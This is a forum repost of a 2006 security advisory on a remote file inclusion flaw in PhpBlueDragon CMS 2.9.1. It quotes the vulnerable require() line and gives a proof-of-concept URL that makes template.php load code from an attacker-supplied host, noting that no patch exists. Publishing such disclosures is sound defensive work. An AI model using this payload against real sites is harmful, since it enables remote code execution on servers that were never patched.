banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits PhpBlueDragon CMS 2.9.1, File inclusion vulnerability  XML
  [Question]   PhpBlueDragon CMS 2.9.1, File inclusion vulnerability 15/06/2006 20:33:59 (+0700) | #1 | 370
[Avatar]
LeonHart
HVA Friend

Joined: 10/01/2003 11:11:52
Messages: 215
Location: Secret
Offline
[Profile] [PM]
-----------------------------------------------------
Advisory id: FSA:015

Author: Federico Fazzi
Date: 14/06/2006, 18:20
Sinthesis: PhpBlueDragon CMS 2.9.1, File inclusion vulnerability
Type: high
Product: http://phpbluedragon.net/
Patch: unavailable
-----------------------------------------------------

1) Description:
Error occured in template.php, line 23:

---
require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php");
---

2) Proof of concept:
Code:
http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/ 
(note this is with final slash (/))



3) Solution:
sanitized $vsDragonRootPath
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|